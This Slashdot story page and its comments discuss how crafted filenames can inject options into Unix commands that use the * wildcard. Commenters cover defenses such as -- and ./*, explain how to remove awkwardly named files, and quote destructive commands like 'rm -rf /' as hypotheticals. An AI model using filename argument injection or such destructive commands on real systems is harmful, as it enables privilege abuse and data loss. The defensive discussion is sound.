Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Security Unix Linux

Exploiting Wildcards On Linux/Unix 215

An anonymous reader writes: DefenseCode researcher Leon Juranic found security issues related to using wildcards in Unix commands. The topic has been talked about in the past on the Full Disclosure mailing list, where some people saw this more as a feature than as a bug. There are clearly a number of potential security issues surrounding this, so Mr. Juranic provided five actual exploitation examples that stress the risks accompanying the practice of using the * wildcard with Linux/Unix commands. The issue can be manifested by using specific options in chown, tar, rsync etc. By using specially crafted filenames, an attacker can inject arbitrary arguments to shell commands run by other users — root as well.
This discussion has been archived. No new comments can be posted.

Exploiting Wildcards On Linux/Unix

Comments Filter:
  • Question... -- ? (Score:5, Informative)

    by beh ( 4759 ) * on Friday June 27, 2014 @10:14AM (#47332419)

    Who does NOT use -- in their scripts, if they're safety conscious?

            rm -i -- *

    Problem solved?

    Normal programs should stop processing options after a (standalone) "--" and take everything following it as regular parameters. getopt and similar libraries handle this automatically.

    I really wouldn't class the "use of wildcards" as a security risk - the security risk is the developer that doesn't know what he's doing.
    Would command line handling be a security risk, if someone would add a --superuser-rm option to his code and execute "rm -rf /" as root immediately afterwards?

  • by Anonymous Coward on Friday June 27, 2014 @10:17AM (#47332439)

    posting the answer to this useless story that was posted to FD

    Date: Thu, 26 Jun 2014 12:55:42 -0700
    From: Michal Zalewski

    > We wanted to inform all major *nix distributions via our responsible
    > disclosure policy about this problem before posting it

    I'm not sure how to put it mildly, but I think you might have been
    scooped on this some 1-2 decades ago...

    Off the top of my head, there's a rant about this behavior in "The
    Unix-Haters Handbook", and there are several highly detailed articles
    by David Wheeler published over the years (e.g.,
    http://www.dwheeler.com/essays/filenames-in-shell.html).

    Yup, it's a counterintuitive behavior that leads to security problems.
    The odds of changing the semantics at this point are very slim. Other
    operating systems have their own idiosyncrasies in this area - for
    example, Windows it not a lot better with parameter splitting and
    special filenames. /mz

  • Question... -- ? (Score:4, Informative)

    by Marneus68 ( 2329096 ) on Friday June 27, 2014 @10:24AM (#47332489)
    After years of using command line programs daily I never heard of -- before today. It was never brought up in school, nor did I see any specific thread / blog post on the subject. So to answer your question, I don't. I've never heard about that before. Where did you learn about that ?
  • Re:Question... -- ? (Score:2, Informative)

    by PIBM ( 588930 ) on Friday June 27, 2014 @10:38AM (#47332635) Homepage

    Are you running commands, with root on stuff you don't know where it comes from ?

    If you absolutely have to go run the query in the folder into which someone has upload/file creation, then at least use ./* if the tool doesn't support --.

    This is not an issue if you work recursively on the directory holding whatever they want, which should cover most of the situations. A bad admin can run queries that are as dangerous or worst pretty fast!

    Always be cautious when running someone else shell script, that's even more dangerous..

  • Re: Question... -- ? (Score:2, Informative)

    by Anonymous Coward on Friday June 27, 2014 @10:44AM (#47332683)

    rm ./--

  • Re:Question... -- ? (Score:5, Informative)

    by hawguy ( 1600213 ) on Friday June 27, 2014 @10:46AM (#47332705)

    You've never had a stupid program crash and create a file named "--" or something similar in its working directory? Now try to remove the file without knowing about the "--" command line options.

    rm ./--

  • Re:Question... -- ? (Score:4, Informative)

    by fnj ( 64210 ) on Friday June 27, 2014 @11:36AM (#47333191)

    Most admins find out about -- after they run into a situation where they accidentally created a file with a name like "-f" go ahead, try and delete a file named "-f" any other way.

    rm ./-f
    Is the most dead-simple way of doing it and is portable to non-gnu-based systems, although even BSD has the double-dash option nowadays.

    And there is always the old standby of insulating the operation from bash command line expansion:
    perl -e 'unlink "-f";'

    You could also, within a minute or so, write and compile a literally two-line C program to remove it. I don't understand the mystery.
    #include <unistd.h>
    int main() { unlink("-f"); }

  • Re:Question... -- ? (Score:5, Informative)

    by Chris Mattern ( 191822 ) on Friday June 27, 2014 @12:12PM (#47333595)

    Can someone explain to me why all these program manpage references have e.g. "(1)" after them?

    It's the manpage section. Section 1 is general commands, for example, while section 3 is library calls. Thus, if you want to see the man page for the printf command, you can say "man 1 printf", while if you want to see the man page for the printf system call, you can say "man 3 printf".

  • Re:Question... -- ? (Score:5, Informative)

    by virx ( 459384 ) on Friday June 27, 2014 @12:35PM (#47333875)

    man man

                  The table below shows the section numbers of the manual followed by the types of pages they contain.

                  1 Executable programs or shell commands

                  2 System calls (functions provided by the kernel)

                  3 Library calls (functions within program libraries)

                  4 Special files (usually found in /dev)

                  5 File formats and conventions eg /etc/passwd

                  6 Games

                  7 Miscellaneous (including macro packages and conventions), e.g. man(7), groff(7)

                  8 System administration commands (usually only for root)

                  9 Kernel routines [Non standard]

  • by AC-x ( 735297 ) on Friday June 27, 2014 @12:52PM (#47334067)

    Since one is root, one can do anything anyway so why bother with all this misdirection?

    Because you can trick a more privileged user into executing commands for you by writing files into your own folder. Most the examples given were of admin housekeeping tasks run against a user writeable folder.

  • Re:what about? (Score:5, Informative)

    by Anonymous Coward on Friday June 27, 2014 @01:25PM (#47334341)

    Unless you were, say, in /etc, this wouldn't really do much harm. The only file containing a . in my / is initrd.img, which even if it weren't a symlink, is easy to to regenerate.

    -r is the recursive switch causing it to visit every sub directory.

    So, rm -rf *.* would delete any file in the entire file system with a . in it....including, as you point out, /etc.

    No, it wouldn't!

    The shell expanse the wildcards before calling the command. All rm sees is "initrd.img" as argv[2].

    rm will not see the *.* at all, unless the shell can't expand the wildcard to any valid file- or directory name and even if the shell had to forward the *.* as-is to rm (if *.* didn't match anything in /), rm still wouldn't find anything matching /etc/*.* as it doesn't do glob()'ering itself. Why would it? The shell already did that.

    Furthermore -r means "visit any subdirs of the dirs given as arguments to rm ", not "all directories there ever was and ever will be".

    TL;DR: You have no idea what the hell you're talking about.

    Damn it, /. You used to be cool and know this stuff. :-(

"Everything should be made as simple as possible, but not simpler." -- Albert Einstein

Working...